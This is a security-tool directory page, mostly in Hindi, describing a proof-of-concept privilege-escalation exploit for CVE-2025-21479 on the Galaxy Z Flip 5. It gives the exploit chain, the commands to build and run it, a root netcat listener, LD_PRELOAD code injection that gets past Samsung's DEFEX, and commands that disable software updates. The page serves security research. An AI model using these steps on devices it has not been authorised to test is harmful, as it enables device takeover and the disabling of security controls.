Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
omae-wa-cheese-da — CVE-2025-21479 PoC ZFlip5 के लिए, जिसमें Knox रास्ते में है!(˶˃ ᵕ ˂˶) | Kitploit
उपकरण/GitHubGitHub/ma4the/omae-wa-cheese-da
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिशोषण फ्रेमवर्कशोषणमोबाइल सुरक्षालर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubma4the/omae-wa-cheese-da

omae-wa-cheese-da

CVE-2025-21479 PoC ZFlip5 के लिए, जिसमें Knox रास्ते में है!(˶˃ ᵕ ˂˶)

रिपॉजिटरी देखें
153122 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

omae-wa-cheese-da

Image

GPU arbitrary physical R/W (CVE-2025-21479) -> KASLR leak -> SELinux permissive -> RKP-safe init-hook root server & DEFEX bypass custom binary exec (LD_PRELOAD)

इसमें लगभग 6 मिनट लगते हैं.. धैर्य रखें।

मैं इसे बाद में ऑप्टिमाइज़ करूँगा।

परीक्षण किए गए डिवाइस

  • Galaxy Z Flip 5 (SM-F731N)

  • फ़र्मवेयर: F731NKSU5EYD9

  • Android: 15

  • सुरक्षा पैच: 2025-04-01

  • SoC: Snapdragon 8 Gen 2 (SM8550 / kalama)

  • GPU: Adreno 740 v2

  • Galaxy Z Flip 5 (SM-F7310) — परीक्षण और चलाने के लिए @eoegamer को धन्यवाद!!

  • फ़र्मवेयर: F7310ZCS4CXH2

  • Android: 14

  • SoC: Snapdragon 8 Gen 2 (SM8550 / kalama)

  • GPU: Adreno 740

आवश्यकताएँ

  • अगस्त 2025 से पहले का सुरक्षा पैच
  • Adreno A7xx GPU

पैच जाँच

GPU फ़र्मवेयर पैटर्न का उपयोग करें:

root@kitploit:~
xxd /vendor/firmware/a740_sqe.fw | grep -i "0300 422a"

यदि यह मेल खाता है, तो फ़र्मवेयर असुरक्षित है

root@kitploit:~
; vulnerable firmware (v675)
and $04, $12, 0x3

; patched firmware (v676)
and $04, $12, 0x7

बिल्ड और उपयोग

exploit.c F731NKSU5EYD9 के लिए बनाया गया है।

अन्य फ़र्मवेयर के लिए, पहले इसे port_extract.py के साथ पुनः लक्षित करें (PORTING.md देखें)

root@kitploit:~
# build exploit.c with the Android NDK (aarch64), e.g.:
#   $NDK/toolchains/llvm/prebuilt/*/bin/aarch64-linux-android34-clang exploit.c -o cheese
adb push cheese /data/local/tmp/
adb shell 'chmod +x /data/local/tmp/cheese; /data/local/tmp/cheese'

हर बूट पर एक बार चलाएँ (रूट सर्वर स्थायी नहीं है)।

सफल होने पर यह लूपबैक (127.0.0.1:4444) से बंधा एक रूट toybox nc लिसनर छोड़ता है। adb shell से रूट शेल प्राप्त करें:

root@kitploit:~
adb shell
nc 127.0.0.1 4444          # root shell, uid=0  (u:r:sec_system_init_shell:s0)

स्टॉक बाइनरी अभी भी सीधे चल सकती हैं।

समस्या यह है कि DEFEX कस्टम नेटिव बाइनरी को सीधे निष्पादित करने पर ब्लॉक कर देता है।

इसलिए इसके बजाय, रूट शेल से अपने कस्टम कोड को स्टॉक होस्ट प्रक्रिया में इंजेक्ट की गई LD_PRELOAD लाइब्रेरी के रूप में चलाएँ:

root@kitploit:~
LD_PRELOAD=/data/local/tmp/test.so /system/bin/toybox true

test.so को __attribute__((constructor)) एंट्री के साथ बनाएं; इसका कंस्ट्रक्टर स्टॉक होस्ट के अंदर रूट के रूप में चलता है!

टिप्स

  • यदि यह 15 मिनट से अधिक समय तक हैंग रहता है, तो रिबूट करें और डिवाइस को ठंडा होने दें।

  • GPU स्प्रेइंग संभाव्य है। विफल होने पर पुनः प्रयास करें या रिबूट करें।

  • सॉफ्टवेयर अपडेट बंद करें

    बंद करें:

    root@kitploit:~
    pm disable-user --user 0 com.sec.android.soagent
    pm disable-user --user 0 com.wssyncmldm
    

    पुनः सक्षम करें:

    root@kitploit:~
    pm enable --user 0 com.sec.android.soagent
    pm enable --user 0 com.wssyncmldm
    

नोट्स

केवल अधिकृत सुरक्षा अनुसंधान और शिक्षा के लिए। सटीक डिवाइस और फर्मवेयर का मेल होना चाहिए।

टूल डाउनलोड करें